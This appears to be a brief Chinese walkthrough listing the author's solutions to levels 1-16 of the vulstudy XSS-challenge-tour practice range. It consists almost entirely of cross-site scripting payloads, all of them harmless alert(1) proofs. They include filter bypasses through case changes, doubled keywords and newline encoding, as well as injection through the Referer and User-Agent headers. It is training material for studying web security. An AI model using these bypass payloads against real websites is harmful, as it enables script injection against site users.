vulstudy之XSS-challenge-tour靶场(1-16)
第一关:
<script>alert(/xss/)</script>
第二关:
"><script>alert(1)</script>
第三关:
' onfocus='alert(1)'
第四关:
" onclick="alert(1)"
第五关:
"><a href=javascript:alert(1)>
第六关:
"><a HREF=javascript:alert(1)>
第七关:
"><a href=javascscriptript:alert(1)>
第八关:
javascript:alert(1)
第九关:
javascript:alert(1)//http://
第十关:
?t_sort=" onfocus=alert(1) type=text "
第十一关:
Referer: "type="text" autofocus onfocus="alert(1)"
第十二关:
User-Agent: " type="text" autofocus onfocus="alert(1)"
第十三关不知道为什么php报错了,没能够写,但是看了一下后台的源码,和第十二、第十一关差不多,只是将xss点放在了cookie上而已
第十四关的网页打开不知道是干啥的。。。,也没有写
第十五关:
'level1.php?name=test<img src=1 onerror=alert(1)>'
第十六关:
<img%0Asrc=1%0Aonerror=alert(1)>